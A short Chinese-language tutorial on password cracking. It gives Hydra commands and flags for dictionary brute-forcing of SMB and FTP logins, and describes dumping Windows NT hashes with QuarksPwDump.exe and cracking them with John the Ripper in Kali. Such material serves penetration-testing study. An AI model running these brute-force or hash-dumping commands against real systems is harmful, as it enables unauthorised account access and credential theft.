一、Hydra
1、Windows版
1、命令语法
hydra -l 用户名 -p 密码 目标IP 对方开放的端口服务名称
例1:hydra -l a -p a smb://123.0.0.1 -f //smb为445端口文件共享服务
hydra -L 用户名字典路径 -P 密码字典路径 目标IP 对应服务
例2:hydra -L D:/dictionary/user.txt -P D:/dictionary/pass.txt ftp://123.0.0.1 -f
//详细参数说明
-l 指定具体用户名
-L 指定用户名字典
-p 指定具体密码
-P 指定密码字典
-VV 显示详细细节
-o 保存破解结果
-f 找到正确密码就停止爆破
-e
n null 尝试空密码
s name 尝试与用户名相同的密码
r 反向 尝试与用户名的倒置
-e使用时 -e nsr
2、进入cmd,在hydra.exe所在的文件目录下调用
D:\hydra8.1>hydra -L D:\Dictionary\user.txt -P D:\Dictionary\pass.txt ftp://192.168.23.6 -f -vV -e nsr
2、Kali Linux版
1、kali中内置了这个软件,不用进入到相应的文件目录下,在root模式下直接编辑就可,语法与Windows版一致
破解能否成功关键在于密码字典的选择。
二、John
1、windows端操作
①、利用QuarksPwDump.exe来获取文件的hash值,需要在cmd窗口进入文件所在目录下,调用QuarksPwDump.exe,结果如下:
2、Kali Linux 利用John来破解
将windows的hash值赋值到kali里面来,然后利用John来破解,这里复制的文件名为goal.hash ,需要指定字典
查看破解的密码值: john --show goal.hash --format=NT